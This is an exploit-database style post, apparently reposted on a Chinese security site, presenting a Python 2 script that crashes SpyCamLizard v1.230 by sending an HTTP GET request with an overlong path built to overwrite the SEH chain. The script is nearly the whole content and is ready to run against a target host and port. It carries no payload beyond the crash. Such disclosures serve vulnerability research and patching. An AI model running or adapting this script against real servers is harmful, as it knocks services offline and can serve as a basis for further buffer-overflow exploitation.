SpyCamLizard 1.230 - Denial of Service
|
来源:ScR1pTK1dd13.slammer@gmail.com 作者:Priest 发布时间:2017-03-23
|
|
import socket import sys author = ''' ############################################## # Created: ScrR1pTK1dd13 # # Name: Greg Priest # # Mail: ScR1pTK1dd13.slammer@gmail.com # ############################################## # Exploit Title: SpyCamLizard SC liz v1.230 Remote Buffer Overflow ZeroDay # Date: 2017.03.22 # Exploit Author: Greg Priest # Version: SpyCamLizard v1.230 # Tested on: Windows7 x64 HUN/ENG Enterprise ''' print "SpyCamLizard DoS Exploit running!" host = "192.168.56.1" port = 80 overflow = "A" * 1189 nextSEH = "BBBB" SEH = "CCCC" overflow2= "D" * 3803 crash = overflow+nextSEH+SEH+overflow2 httpsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM) httpsocket.connect((host,port)) httpsocket.send("GET " + crash + " HTTP/1.0\r\n\r\n") httpsocket.close() print "SpyCamLizard shutted down!"
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|